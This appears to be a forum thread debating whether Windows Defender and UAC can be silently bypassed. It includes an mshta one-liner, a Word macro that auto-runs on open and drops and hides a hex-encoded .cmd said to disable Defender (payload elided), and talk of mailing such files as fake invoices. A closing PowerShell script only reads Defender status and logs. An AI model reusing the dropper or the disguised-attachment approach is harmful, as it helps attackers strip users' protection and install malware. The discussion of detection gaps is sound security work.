If VirusTotal doesn't detect the threat, then what is there to do to protect you? If it's already on the system and is executing without detection, it could kill pretty much whatever it wants. For another AV, the virus could take ownership and force delete the .sys files for the existing antivirus, making Windows BSOD on reboot. If it's spyware and you have a firewall, it could still loopback through Firefox...
VirusTotal is a bit deceiving and should never be used as the sole trust factor, as most products featured don't actually trigger their heuristics/HIPS/sandboxing when being batch-run in VMs. 0-days and such require hybrid analysis / sandboxing - there are several choices available online now (each with their pros and cons, RIP Anubis). Anyway, that's beside the point. It's not considered a threat because it is not a threat. You can't expect others to be more Catholic than the Pope. "UAC is not a security boundary" -Microsoft. But actually proper AVs installed on real machines have heuristics engines that, if not blocking, will at least alert you before executing cmd from Notepad, for example. And you can't "pull the rug" from other AVs so easily - almost all of them have quite powerful defenses via kernel drivers, and not just one, but multiple redundancies. It takes having access to an exploitable signed driver to even begin attacking them. What's actually hilarious - or very sad - depending on which point you are looking from, is that Defender immediately goes mad when executing stuff like this:
Code:
mshta "javascript:window.close(new ActiveXObject('WScript.Shell').Run('regedit.exe -m', 1, 'False'))"
Yet it's completely fine with stuff we've showcased in this thread.
Relying on VirusTotal results is a bad idea; it does not include real-time execution detection and behavioral detection, it only scans a file in the most basic way. A virus can be encrypted and hidden in a file, and VirusTotal will flag it 100% clean, but the antivirus real-time protection will immediately block this threat when the software tries to extract and execute the malicious lines. For example, today I tested Kaspersky Free against the methods to bypass WD and UAC posted on page 5 of this thread; it blocked the UAC bypass methods instantly. It doesn't mean that it'll surely protect against every UAC bypass, but apparently they have a database for such bypasses and they detect them. WD should have blocked the UAC bypasses and, for the love of god, at least the .chm help file method, but they don't care, other AVs do, that's the whole point of this thread. edit - just saw that BAU posted above too.
More troublesome is that there are dozens of so-called "penetration testing" toolkits available to automate multiple methods until one succeeds - most DLL-injection/MSI/cmstplua/ctf/wnf ones work just fine and not even Kaspersky will cover all of them.. and why should they? Why should a 3rd party fix what Microsoft themselves don't "elevate" (pun intended) as being an issue? Nobody even bothers reporting UAC bypasses anymore, and stuff only ever gets fixed when tangentially hit by a larger issue.
Not only is this true, but it becomes more true every year. It is impossible to replicate a real bare-metal system and the actual attack vector used at the point of infection for the torrent of samples coming into VT, so the results should be thought of as a piece of the total picture, not a conclusive answer.
Example doc macro
Code:
Private Sub Document_Open()
    Dim i As Long
    Dim nFileNum As Integer
    Dim sFilename As String
    Dim strBytes As String
    Dim arrBytes As Variant
    sFilename = Environ("Temp") & "\d.cmd"
    strBytes = "00 00 00 ... 00 00 00"
    strBytes = strBytes & " 00 00 00 ... 00 00 00"
    arrBytes = Split(strBytes)
    nFileNum = FreeFile
    Open sFilename For Binary Lock Read Write As #nFileNum
    For i = LBound(arrBytes) To UBound(arrBytes)
        Put #nFileNum, , CByte("&H" & arrBytes(i))
    Next i
    Close #nFileNum
    Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
End Sub
strBytes holds d.cmd as hex. d.cmd disables Defender (UAC bypass included). Undetected. Functional under an admin account. The script can continue by installing malware; Defender will already be disabled.
Installed Windows 10 2004; it seems like WD has been improved a bit to deal with unwanted applications. I noticed some changes in notifications and warnings and in the way it denies running an app. BAU's .cmd and .chm file methods to disable WD are still working fine without any warning from WD, so yeah, it's still the worst AV. Anyone's whole system can be destroyed if someone decides to send such files over email masquerading as an invoice file or some other important work-related file from some company; if properly sent, most users will download and run it. The script will then simply proceed to download malware/ransomware and execute it, and all of this is very simple to do. It's hard to believe that almost no one in the mainstream section seems to talk about such a big security flaw, especially when the majority now runs Windows 10 and most of them rely on WD to protect the system. I tried to report it to some security-related sites but got no response from them, yet they still mention how tamper protection is very effective and will save users from malware.
Pff. I had assumed the April security patch had fixed it since it mentions a s**tload of CVEs regarding elevation of privileges and token manipulation, in all Windows versions (even discontinued 7 got patched). So the easiest-to-exploit UAC backdoor still remains; it's "by design" and "won't fix". Tx, Microsoft!
Guys, you've never heard of "Controlled Folder Access" and "Windows Defender Ultra Secure Sandbox Mode"? Oddly enough, this is old news! So some kind of script becomes just a futile attempt.
Seems like you haven't tested the awesome effectiveness of the mentioned tricks to disable Windows Defender completely. The Controlled Folder Access feature is pointless because the script will disable WD and later any process can access anything. I've mentioned previously how malicious actors can easily distribute such scripts to general users. Currently my system hardware is not allowing me to test the sandbox feature, but I'm pretty sure that most users who do simple browsing on the internet don't (and won't) use the sandbox for that. I guess the sandbox won't make a difference when it comes to disabling WD (running inside the sandbox) with the script.
The same applies to our interaction: read the comments above, learn how to use everything your OS provides in implementing security. Windows 10 provides this option to the average user very well (then you would know what the script touches in your OS and how). Instead of spending energy on scripts with no effect (or impressing the ignorant), get to know the capabilities of your operating system. PS: Dunning-Kruger effect.
Here's a picture of me, interacting: Joke aside, first you are disrespecting fellow MDL users in this thread by NOT OPENING A GOD DAMN POWERSHELL AND COPY-PASTING THOSE 100 LINES TO PROVE YOUR POINT, then you start throwing personal insults without any provocation. Spoiler: What does Google have to say about someone like you? I don't care.
@shewolf I've seen in the WUMT and WUmgr threads how you interact with users. Anyway, I'm attempting one last time to reason with you. WD allows saving downloaded files from browsers if you put the download folder in Controlled Folder Access. Even if it doesn't, you would need to enable it so you can download things. Once the user clicks on the script, the whole protection will be disabled and any process can access anything in those protected folders. What's there to not understand? Which point is incorrect?
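The posts above argue about whether tamper protection and Controlled Folder Access are actually on and whether a script silently switched real-time protection off. As an added example that is not from the thread or any poster, this read-only PowerShell check reports those settings through the built-in Defender cmdlets and pulls the Defender operational-log events that record such a change; it assumes Windows 10 with the Defender module present and an elevated shell.

```powershell
# Added example (not from the thread): read-only Defender posture check.
# Assumes Windows 10 with the built-in Defender cmdlets, run from an elevated PowerShell.

function Get-DefenderPosture {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # EnableControlledFolderAccess: 0 = Disabled, 1 = Enabled, 2 = Audit mode
    $cfa = switch ($pref.EnableControlledFolderAccess) {
        0       { 'Disabled' }
        1       { 'Enabled' }
        2       { 'AuditMode' }
        default { "Unknown($_)" }
    }

    [pscustomobject]@{
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        TamperProtected           = $status.IsTamperProtected
        AntivirusEnabled          = $status.AntivirusEnabled
        ControlledFolderAccess    = $cfa
        ProtectedFolders          = @($pref.ControlledFolderAccessProtectedFolders)
        # Should be False on a healthy system; True means real-time monitoring was
        # switched off by policy or by a script and tamper protection did not stop it
        DisableRealtimeMonitoring = $pref.DisableRealtimeMonitoring
    }
}

function Get-DefenderTamperEvents {
    param([int]$Hours = 24)
    # 5001 = real-time protection disabled, 5007 = Defender configuration changed,
    # 1123 = Controlled Folder Access blocked a write to a protected folder
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5007, 1123
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # SilentlyContinue: Get-WinEvent reports a non-terminating error when nothing matches
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

Get-DefenderPosture | Format-List
Get-DefenderTamperEvents -Hours 48 | Format-Table -AutoSize
```

A 5001 or 5007 event shortly after a downloaded .cmd or .chm was opened is the trace the thread says WD itself never warns about, so it is worth checking on a test machine before and after running such a sample.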